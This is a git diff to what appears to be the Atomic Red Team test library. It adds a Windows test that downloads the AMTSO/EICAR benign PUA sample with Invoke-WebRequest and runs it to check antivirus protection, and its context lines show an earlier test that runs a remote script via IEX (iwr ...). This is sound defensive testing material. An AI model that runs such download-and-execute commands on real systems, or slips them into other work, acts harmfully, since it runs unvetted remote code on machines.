[windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index bd58176c..803162e4 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md 
@@ -982,6 +982,7 @@ - Atomic Test #5: Office launching .bat file from AppData [windows] - Atomic Test #6: Excel 4 Macro [windows] - Atomic Test #7: Headless Chrome code execution via VBA [windows] + - Atomic Test #8: Potentially Unwanted Applications (PUA) [windows] - T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1106 Native API](../../T1106/T1106.md) - Atomic Test #1: Execution through API - CreateProcess [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 0f121130..107864b9 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -54525,6 +54525,38 @@ execution: IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome" name: powershell + - name: Potentially Unwanted Applications (PUA) + auto_generated_guid: 02f35d62-9fdc-4a97-b899-a5d9a876d295 + description: 'The Potentially Unwanted Applications (PUA) protection feature + in antivirus software can identify and block PUAs from downloading and installing + on endpoints in your network. These applications are not considered viruses, + malware, or other types of threats, but might perform actions on endpoints + that adversely affect their performance or use. This file is similar to EICAR + test virus file, but is considered a Potentially Unwanted Application (PUA) + instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify + anti-pua protection). + +' + supported_platforms: + - windows + input_arguments: + pua_url: + description: url to PotentiallyUnwanted.exe + type: url + default: http://amtso.eicar.org/PotentiallyUnwanted.exe + pua_file: + description: path to PotentiallyUnwanted.exe + type: Path + default: "$env:TEMP/PotentiallyUnwanted.exe" + executor: + name: powershell + elevation_required: false + command: | + Invoke-WebRequest #{pua_url} -OutFile #{pua_file} + & "#{pua_file}" + cleanup_command: 'Remove-Item #{pua_file} + +' T1204.001: technique: created: '2020-03-11T14:43:31.706Z' diff --git a/atomics/T1204.002/T1204.002.md b/atomics/T1204.002/T1204.002.md index 340a7a23..eda78a1e 100644 --- a/atomics/T1204.002/T1204.002.md +++ b/atomics/T1204.002/T1204.002.md 
@@ -22,6 +22,8 @@ While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently - [Atomic Test #7 - Headless Chrome code execution via VBA](#atomic-test-7---headless-chrome-code-execution-via-vba) +- [Atomic Test #8 - Potentially Unwanted Applications (PUA)](#atomic-test-8---potentially-unwanted-applications-pua) +
@@ -424,4 +426,39 @@ Write-Host "You will need to install Google Chrome manually to meet this require +
+
+ +## Atomic Test #8 - Potentially Unwanted Applications (PUA) +The Potentially Unwanted Applications (PUA) protection feature in antivirus software can identify and block PUAs from downloading and installing on endpoints in your network. These applications are not considered viruses, malware, or other types of threats, but might perform actions on endpoints that adversely affect their performance or use. This file is similar to EICAR test virus file, but is considered a Potentially Unwanted Application (PUA) instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify anti-pua protection). + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| pua_url | url to PotentiallyUnwanted.exe | url | http://amtso.eicar.org/PotentiallyUnwanted.exe| +| pua_file | path to PotentiallyUnwanted.exe | Path | $env:TEMP/PotentiallyUnwanted.exe| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Invoke-WebRequest #{pua_url} -OutFile #{pua_file} +& "#{pua_file}" +``` + +#### Cleanup Commands: +```powershell +Remove-Item #{pua_file} +``` + + + + +